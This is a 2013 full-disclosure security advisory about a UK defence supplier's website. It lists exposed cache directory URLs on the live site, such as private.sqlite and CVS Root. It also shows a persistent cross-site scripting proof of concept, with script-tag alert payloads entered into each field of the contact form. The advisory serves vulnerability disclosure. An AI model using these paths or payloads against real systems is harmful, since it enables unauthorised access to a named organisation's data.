Optomise System Ltd XSS / Information Disclosure

`OPTOMISE SYSTEM Ltd (UK Ministry of Defence and emergency services) Full Directory Information Disclosure/ Persistent XSS /  
  
Time Line Vulnerability************************  
04-11-2013 Security Advisory  
07-11-2013 Ask About the Issues -> Not Reponse  
14-11-2013 Ask About the Issues-> Not Response -> Not Fixed  
18-11-2013 Full Disclosure  
  
  
I. VULNERABILITY-------------------------  
#Title: OPTOMISE SYSTEM Ltd Full (UK Ministry of Defence and emergency services.) Full Directory Information Disclosure/ Persistent XSS   
#Vendor:https://www.optomise.com  
#Author:Juan Carlos García (@secnight)  
#Follow me http://asap-sec.comTwitter:@secnight  
II. DESCRIPTION-------------------------  
Optomise Systems Limited specialise in sourcing and promoting advanced technology, systems and products from UK and international companies, to the UK   
Ministry of Defence and emergency services.   
The experienced team at Optomise has a thorough understanding of the UK Ministry of Defence procurement system, and their operational and capability   
requirements.   
This knowledge, together with a remarkable international personal database of companies, links and a network of International Associates, ensures that the   
team is well placed to advise, assist, develop and create the right environment for a successful business arrangement.   
Whether facilitating the development of a joint venture, partnership, subsidiary or selling a single piece of hardware, Optomise approach every task with the   
same commitment, to obtain and provide the best result.   
Whatever the size or scale of your organisation, the services offered can be totally flexible and tailored to meet your specific needs.   
Optomise has a working relationship within all levels of the Ministry of Defence and the team is equally at home talking to decision-makers or end users.   
This combination has proven very successful and business has expanded through personal recommendation.   
Optomise Systems is a member of the Advancing UK AeroSpace Defence and Security Industries (ADS) and a board member of the National Defense Industrial   
Association (NDIA), SO/LIC Committee, in the USA.  
  
  
III. PROOF OF CONCEPT-------------------------  
  
Full Directory Information Disclosure**************************************  
https://www.optomise.com/cachehttps://www.optomise.com/cache/-+index/https://www.optomise.com/cache/70+direct-sales/https://www.optomise.com/cache/70,171,172,179+index/https://www.optomise.com/cache/536_1015x672_0x.bzr.jpeghttps://www.optomise.com/cache/plus+webftp/https://www.optomise.com/cache/privado+index/https://www.optomise.com/cache/private.sqlite+index/https://www.optomise.com/cache/processSimple.do+index/https://www.optomise.com/cache/public+proxy.php/https://www.optomise.com/cache/CVS+Root/etcetcetc  
  
  
Persistent Cross-Site Scripting******************************  
Go to --------  
https://www.optomise.com/contact-us/  
Form  
Name  
<script>alert("asapsec")</script>  
Company  
<script>alert("asapsec")</script>  
Email Address  
<script>alert("asapsec")</script>  
Phone Number  
<script>alert("asapsec")</script>  
Comments  
<script>alert("asapsec")</script>  
Response:---------  
"Thank you"Thank you for your enquiry. Someone will get back to you shortly."  
  
The impact of this vulnerability**********************************  
(...)  
How to fix this vulnerability******************************  
Write Secure Code  
IV. BUSINESS IMPACT-------------------------This type of security Flaws are extremely dangerous because it can be a serious impact on customers and states.. (... military...).   
Disclosure about the military components and other things  
V SOLUTION------------------------  
Write Secure Code  
VI. CREDITS-------------------------  
This vulnerability has been discoveredby Juan Carlos García(@secnight)  
  
VII. LEGAL NOTICES-------------------------  
The Author accepts no responsibility for any damage   
`